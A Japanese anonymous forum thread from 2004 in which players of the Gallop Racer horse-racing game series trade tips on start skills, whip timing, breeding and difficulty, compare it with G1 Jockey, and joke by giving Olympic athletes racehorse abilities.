よく俺はあれに合わせてやってたと思う。
早すぎて見えねぇ。
本当だな?
見えないんだな?
おたくも暇ですねえ
スタートのスキルがないから早いんだよな
オンとか慣れてると何でもないが
256 :
名無しさん@お馬で人生アウト:04/08/11 17:57 ID:mmhjJfbA
age
257 :
名無しさん@お馬で人生アウト:04/08/11 21:25 ID:S97k4e9A
オンはスタートスキル取った状態だぞ
259 :
名無しさん@お馬で人生アウト:04/08/12 03:05 ID:96VbOgUl
オリホを種牡馬にした時の種付け料って
どのくらいまであがるの?
ちなみにウチでは芝向き・中距離の成長普通で8億2120万が最高。
アビは四角先頭・海外好き・重馬場○
パラは成績・クラ・スピ・スタがSS、持続・瞬発がS
であとはBとCが半々。
一応9億9990万が最高だと思う。
ライバル騎手のあと1人がなかなか出てこないんですが
あと1人はエンタ君の中の人なんですか?
DC、DS参戦で大村ジジイが出てくる。
263 :
名無しさん@お馬で人生アウト:04/08/12 22:03 ID:+Oc98CH9
オンのスタートはスキル取った状態だよ〜。最初からやれば分かるよ
>>263 漏れのはオンとオフのスタート全然違う…
オフシーズン≠オフのフリー等=オン になってるよ
オンでスタートのスキルが適用されてるなら風車ムチや豪腕がないのはおかしい
逃げ差し追込はどのあたりでムチ使えばレボるんですか?
先行はだいたい350mあたりで使えばレボるのは分かったのですが・・・・
>>265 確かにスタートはそうなっているね。
確認できるスキルはある程度のスタートレベルと風車ムチだけかな。
>>266 レボに仕掛けの位置は関係ないよ。
脚質にあったスタート、残り600mまでの位置取り・折り合いがしっかりすれば、レボは発動する。
差し・追い込みでレボが発動しないのは大抵スタート後の位置取りが悪い場合が多い。
逃げだと出だしが悪いか道中の位置取りかな。
269 :
名無しさん@お馬で人生アウト:04/08/14 01:44 ID:R+dDRYb1
650までね
600だろ。
悪い誤爆した。
逃げはタイプがわかってて、スタートさえミスらなきゃ9割レボるよな
>>272 COMによっぽど絡まれなければな
けつブロックで終了だが
え
俺逃げ馬で全然れぼれない・・
よし、ザテトラークの仔で爆発で長距離馬で芝ダ兼で
ついでに晩成が出来た
でもアビは脅威の粘りだけか……
276 :
名無しさん@お馬で人生アウト:04/08/15 17:39 ID:GNXlUqbY
ここ名無ししかいないよね
GIJスレはコテ含めて大盛り上がりなのに
糞ゲーだってことだね( ´,_ゝ`)プッ
昔ベイガソとかいう奴がいなかったっけ
ベイガンってFF4にいたよな。
腕が自爆するアレか…もう10年以上前だね
その後に出てくる四天王のカイナッツォより強かった
FF4を語るスレはここですか?
メーター類全部撤去してはじめからプレー中
かなりおもろい
>>282 メーター類全部なくして折り合い低い馬とかやると本当にむずい・・・
サイレンススズカとかその辺乗っててちゃんと12時のところで折り合いなのかな?
とかすごい考える
284 :
名無しさん@お馬で人生アウト:04/08/17 21:36 ID:DelOey6x
285 :
名無しさん@お馬で人生アウト:04/08/17 21:37 ID:c3jUXNSq
286 :
284:04/08/17 21:41 ID:DelOey6x
287 :
名無しさん@お馬で人生アウト:04/08/17 21:57 ID:sXdllBWe
さだだださださださださださださdさださださだs。
____
_,、r'´:::‐、`ヾ‐、`丶、
/:::::l、:{⌒ヾヽ::ト、:ヽ:::::ヽ
//!:::i:l:!::ヾ、::::::ヾ::!`ヽ:ヽ:::::ヽ
〃:!:l::::l!:ト、::::liヽ、:::リ:!::i:::ヽ:ヽ::::i
i:!::!i::i::::i::!:i:ヾ!:i::::!:、:::!:::l:i:!:ヽヽ:l:!
l!::!:!:iト:::!:i:j/代トト、l:ハ::升ト!:l::!:!lj どうでもいいや
li::l::N{:ヾVヘ「 ̄` lハ ソr‐テハ!:l/
!:l!:ト、l::l{` ! j川/ ハハハハ
ヾト辷N! ‐ノ !:l/
Yl:ト、 ヾ==r ノ/
iN \. ` ニ′/}'
h 丶、 /
ノ ̄´"''‐ 、 `¨´U
_rく /癶V⌒!=| ̄ ̄ ̄ ̄ ̄|
__,、=T下、``ヽ /‐''"_, -ヘ| |
/「 ̄´ ヽヽ \ ヽ/ ´ _,,厶ヘ ∧=、、
|八 \ __/ _,)ヽ___/ ヽ ``=、、
‖ \ ! V´ ̄:::::/ _,ノk>、`T!::::::":::\_ ‖
確か全部仮名だったから、能力云々気にしなくて良いのはいいかもw
海外の競馬関連ゲームってどんなのあるんだろ?
292 :
名無しさん@お馬で人生アウト:04/08/20 15:31 ID:UVQL+T9D
いま6をやっているんですが、全GTを制覇してもお手馬を海外GTに出場させることが
出来ないんですけど、何か出場させるための条件とかあるんですか?
>>293 まじでありがとうございます。
気付けよ……俺。
北島康介 大レース○ 4角先頭 ど根性
森田智己 接戦○ 一瞬の切れ
山田沙知子 大レース×
柴田亜衣 大レース○
寺川綾 人気者
北島は後半タイプじゃないっけ?
柴田にはど根性もないと
伊達のパツキンワロタ
インモー 一瞬の切れ 左回り×
299 :
名無しさん@お馬で人生アウト:04/08/23 07:16 ID:wYb/UFr+
室伏
一瞬の切れ
大レース×
右回り×(当たり前か…)
接戦×は付けません。
じゃあ、300。
野口
4角先頭
強心臓
303 :
名無しさん@お馬で人生アウト:04/08/23 21:23 ID:MUNZVlrf
野口みずき 海外好き 大逃げ 二枚腰
ポーラ・ラドクリフ ハイペース○ 大レース× 夏場に弱い
土佐礼子 鉄砲駆け ど根性
そういえばラドクリフって馬実際にいなかったっけ?
ギャロ7買った。確か2以来のギャロでo(^∇^)o ワクワク
最初はロードうざーセーブながーカテネーって思ったが
コツを掴んでくるとなかなかに面白い。
「うわ、スタートミスった」とか「っしゃあ!」とか部屋で一人いってるキモさに愕然。
ただ一つ難を言うと、勝負根性が発揮されてるのわかり難くない?
2の時は▼マークが激しく回転して鬼の勢いで競り返したり。
パルブライトで有馬ハナ差で勝ってしまって本気でガッツポーズした痛い思い出
今作だと直線で赤い顔になってる時は競ってる状態なのかな?よーわからん・・・。
まぁ今更だし、まだ一勝ジョッキーなんでこんな感想ですが
サニブの早熟だけは解せないよう・・・orz
>>307 赤いは仕掛けただけ
鼻息出してたら競り勝ってる
灰色で(´・ω・`)ショボーンだったら競り負けてる
309 :
名無しさん@お馬で人生アウト:04/08/23 22:36 ID:UKberao9
野口みずき 音速の逃亡者 不屈の闘志 コース不問
ポーララドクリフ 融通性無し平坦巧者 夏場に弱い アイドルホース 牝馬戦× スローペース× 浜口京子 大レース× 人気者 接戦× アニマル浜口 馬込み苦手 かかり癖 変幻自在 神出鬼没
>>308 おっとレスTHX
ちょっと注目して見て見ます。
しっかし内に入ろうと連打したら衝突が多い(ヘタレ
レーダーじゃないと後ろの馬なんか思い切り当たりそうに見えるし。
>>310 根性の効果が2は異常なほど凄いからねぇ
それと比べるとどうしても根性がほとんど効いてないように感じちゃうよ
2は確か赤鞭出すのが結構シビアでレース終わったら凄く疲れてたよw
野村忠宏 大レース○ 抜群の安定感 新聞一面×
何で5から音楽の路線変えちゃったのだろう・・。2000までは音楽だけでも結構価値在ったのにね。
ネモフ ど根性、大まわり、人気者
とりあえず次作からまた英語おねーさんの声復活きぼんぬ
松坂 一瞬の切れ 直一気 大レース× 夏場に弱い 海外×
318 :
名無しさん@お馬で人生アウト:04/08/25 06:48 ID:jJGg3l7+
ネモフは小回り×だろ。そんなんじゃ大衆の支持は受けられんぞ
もう馬ゲーの話じゃないな
7安いんだが買いかね?
6はまあまあ楽しめたんだけど
日本代表 オーストラリア× 気抜き癖 接戦×
むしろ松坂には頑丈な体をあげたいが・・・。
逆に谷には繊細な体をプレゼント。
323 :
名無しさん@お馬で人生アウト:04/08/25 17:45 ID:iEuvY+Xv
このスレ悲惨だな
GIJ4が冬に出るっていうしギャロももう終わったな
( ´,_ゝ`)プゲラッチョン
>>322 ネタがないんだからしょうがないじゃん・・・
>>324 DL馬の追加もないしな・・・
このスレが1000いく頃にはドミノを出したいが、
発動系レアアビが全然出ない_| ̄|○
>>325 俺はもうドミノあきらめ状態、ステータスよりもアビ重視で自分が乗ってて面白い馬作りしてる
今のところの一番面白いかなって馬は大逃げ、4角先頭、高速の末脚、一瞬の切れで脚質が逃げ◎追い込み△
距離適正1200〜2200でSPSTは強化版スズカやドバイミレニアムって感じの馬
一応こいつでドリームカップ1頭制覇達成できたのが満足(うまく乗ればまあ勝てるがちょっとミスると乙なレベル)
327 :
名無しさん@お馬で人生アウト:04/08/25 22:20 ID:0hurC/o0
GIJ4マジで楽しみだな
DVDでネット対戦もできるんだろうな
こうなったらギャロは完全にあぼーんだねw
ドミノ出せた人っているのかな?
G1JもGRもどっちもやばいだろ。
売れないG1Jとメーカーのやる気がないGR。
1200戦で手綱をしごかずに楽々先頭に立てるのは何だ
おかげでヤマカンゼファーで惨敗すた
>>330 瞬発力が高いか、中山のような下り坂から始まるコースじゃない?
牧場の繁殖頭数枠増やすには
どうすればいいのでしょうか?
333 :
名無しさん@お馬で人生アウト:04/08/26 21:49 ID:pGUmmJ/5
増えるように祈るべし
>>332 オリホでG1勝つ→カタログでギャロップ牧場購入→枠が4つになる。
オリホ殿堂入り→カタログでラッキーファーム購入→枠が8つになる。
馬鹿みたいに産ませまくると後に悲劇
最初はどんなんでもいいからとりあえずオリホ作ってみることを推奨する。
まあここで俺は受胎した牝馬が死んだり不受胎だったりして2年間棒に振ったわけだが・・・。
で、生まれてきた仔馬が弱かった場合、(俺の時は種牡馬、繁殖の成績、クラフィ両方ともEだったから糞弱かった)
世代にもよるけど2歳GTよりもダービーとかの方がとりやすいかも。(逃げ、先行でないと苦しいが)
一応簡単ならばSP、ST共に50前後の馬でダービーは勝てた。(先行馬でアビは4角先頭。謎に海外好きついてたが・・・。)
後は軌道に乗ってしまえば殿堂入りは簡単。
普通にレース出てくるオリホうざい
確かに。
捨てたオリホがほぼ全部宝塚記念に出てくるから未だにダンツシアトルのメモリアルレースが出せんw
ウチも毎年見放してる晩成オリホが次々と牙をむいてくる
日本ダービー1番人気サンエイソロン、2番人気メジロベイリー、3番人気ビッグファイト、4番人気スエヒロコマンダー
結果1着スエヒロコマンダー、2着アストラルブレイズ
なんだこのゲームは
こうゆうGAME
ドミノって何ですか?
んー、あれだよ
小さい板みたいなのを並べて
倒していくやつだよ
ドミノ出すのってスピスタ130の馬出すより難しそうだ
346 :
名無しさん@お馬で人生アウト:04/08/28 20:39 ID:9Kb6oHqM
英語の声俺も好きだったのに無くなったのはショックだった・・
まだこのゲームやってる人いるの?
あんなの1ヶ月で売ったよ…。
DC、同一馬で6連勝、さてラストのクラシックだ〜
選択馬間違えた…orz
こういう所に「はいorいいえ」付けんかい!
>>347 一ヶ月ももったんだ。俺は3日で売った。
>>347 >>349 どこが気に入らなくて短期間で売ったのか理由を聞いてみたい
そしてそのスレに未だに居る理由も…
351 :
名無しさん@お馬で人生アウト:04/08/29 10:58 ID:QGPrqruJ
ジハード
連戦○
連闘○
オンラインの鬼
帝王
ささり癖(確信犯)
ブロードアピールの根岸Sってこのゲームで言えば
殿一気+直一気+一瞬の切れ+接戦○が発動したような感じ?
354 :
名無しさん@お馬で人生アウト:04/08/30 16:13 ID:e8YdUfbz
あ、GR上で発動させたらの場合でってことで
HARDってどのくらい難しくなるんでしょうか?
現在ノーマルで人気上位の馬に乗れば
ほとんど勝てるくらいの騎乗レベルなんですけど
>>355 正直大して変わらない気がする
持続力・スタミナが-1補正かかるぐらいかな
でもレボりにくくはなるような気がする。
age
確かにレボがホトンドでない
簡単は出すぎだがな
ドミノって何か教えてください
364 :
室伏広治:04/09/02 16:17 ID:EUli2hLu
フリー立ててるから誰か来てちょ
>>348 キンツェム使ってまぐれでできたんだけどやる魅力あんまり無いよ
グラディアテュール(?)て強さ微妙でダンブレのが全然強いと思う
それにしてもキンツェムでやるのはマイルとダートがきつかったな
同じく。いくらなんでも弱すぎ・・・。テディよかマシだが。
まあ差し馬としてはなかなか強いのかも知れんが・・・。
DC,俺もオールキンツェムでやったがダ1200のキンツェム(何故かゴールドティアラもそれなりに強い)
あと芝マイルのタイキシャトルとテューダーミンストレルに何回も殺意を感じた。
逆に芝3200はセントサイモンにくっついてるだけで勝てたから楽だった。
367 :
名無しさん@お馬で人生アウト:04/09/04 02:44 ID:DC+xiXhZ
ってIDがDCじゃん。
ついでにほしゅっとく。
あのパラメータじゃあとてもじゃないが100馬身詰められないな
GR7買ってみたが、そこそこ遊べるけどやっぱマイナーゲーだな
やっぱGRは2までが楽しかったし好きだった
挑戦的な雰囲気で競馬ファンが無視できないオーラがあったと思う
GR3からは平凡な競馬オタが作るマイナーゲームって感じで好きになれん…
370 :
名無しさん@お馬で人生アウト:04/09/04 10:06 ID:e7fh2kOC
だったら一流の競馬オタの君がゲームを作ってくれよ。GR7を越えるゲームを。ま、口先だけのオタキモには無理だろうな
こんな土曜も朝からあおりですか。乙です。
G1Jは贔屓されてる馬とその他の馬の差が凄すぎてエディットがないとやる気になれん。
海外馬が駄馬揃いだし。